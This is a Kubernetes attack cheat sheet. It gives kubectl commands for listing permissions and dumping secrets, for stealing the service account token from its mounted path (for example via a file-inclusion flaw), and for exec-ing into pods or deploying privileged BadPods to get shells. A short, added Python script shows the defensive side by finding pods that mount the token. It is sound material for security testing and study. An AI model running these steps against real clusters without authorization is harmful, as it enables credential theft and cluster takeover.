Kubectl

  • Get pods, -A for all namespaces
kubectl get pods -A
  • Check what the mounted service account secret is allowed to do, then list resources
kubectl auth can-i --list
kubectl get secrets
kubectl get nodes
kubectl get deployments
kubectl get services
kubectl get ingress
kubectl get jobs
  • Get details about a secret, and output it as JSON (kubectl describe has no -o flag, so use get for JSON output)
kubectl describe secrets <secret>
kubectl get secret <secret> -o json

Abuse Token

  • Inside a pod the service account token (JWT) can be found under /var/run/secrets/kubernetes.io/serviceaccount/token
  • If there is a chance of an LFI, extract the token and use it
kubectl auth can-i --list --token=$TOKEN
kubectl get pods --token=$TOKEN
kubectl exec -it <pod name> --token=$TOKEN -- /bin/sh
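
A defender's check for the token path above, as an added example that is not part of the original cheat sheet: it reads the JSON produced by kubectl get pods -A -o json and lists every container that has the service account token directory mounted, so workloads that never call the API can be given automountServiceAccountToken: false. The function name token_mounts and the sample pod data are constructed for illustration.

```python
import json
import sys

TOKEN_DIR = "/var/run/secrets/kubernetes.io/serviceaccount"
MOUNT = {"name": "kube-api-access-x", "mountPath": TOKEN_DIR, "readOnly": True}

# Constructed sample shaped like `kubectl get pods -A -o json` (not real cluster data).
SAMPLE = json.dumps({"items": [
    {"metadata": {"namespace": "shop", "name": "web-1"},
     "spec": {"serviceAccountName": "default",
              "containers": [{"name": "nginx", "volumeMounts": [MOUNT]}]}},
    {"metadata": {"namespace": "shop", "name": "api-1"},
     "spec": {"serviceAccountName": "api", "automountServiceAccountToken": False,
              "containers": [{"name": "api", "volumeMounts": []}]}},
    {"metadata": {"namespace": "ci", "name": "runner-1"},
     "spec": {"serviceAccountName": "deployer",
              "initContainers": [{"name": "setup"}],
              "containers": [{"name": "runner", "volumeMounts": [MOUNT]},
                             {"name": "logs", "volumeMounts": [MOUNT]}]}},
]})


def token_mounts(pod_list_json):
    """Return (namespace, pod, container, service account) for each container
    that has the service account token directory mounted."""
    findings = []
    for pod in json.loads(pod_list_json).get("items", []):
        meta, spec = pod.get("metadata", {}), pod.get("spec", {})
        sa = spec.get("serviceAccountName", "default")
        containers = (spec.get("initContainers", []) + spec.get("containers", [])
                      + spec.get("ephemeralContainers", []))
        for c in containers:
            for m in c.get("volumeMounts", []):
                # Match on the mount path so both projected and secret volumes are caught.
                if m.get("mountPath", "").rstrip("/") == TOKEN_DIR:
                    findings.append((meta.get("namespace"), meta.get("name"),
                                     c.get("name"), sa))
    return findings


if __name__ == "__main__":
    # Pipe real kubectl output in, or run without piped input to use the sample.
    data = SAMPLE if sys.stdin.isatty() else sys.stdin.read()
    for ns, pod, container, sa in token_mounts(data):
        print(f"{ns}/{pod} container={container} serviceaccount={sa}")
```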

Create Pods

  • Use BishopFox's BadPods
  • If there is no internet connection add imagePullPolicy: IfNotPresent to the YAML file
kubectl apply -f pod.yml --token=$TOKEN
  • Start a shell in the pod
kubectl exec -it everything-allowed-exec-pod --token=$TOKEN -- /bin/bash

Start Pods

kubectl exec -it <podname> -n <namespace> -- /bin/bash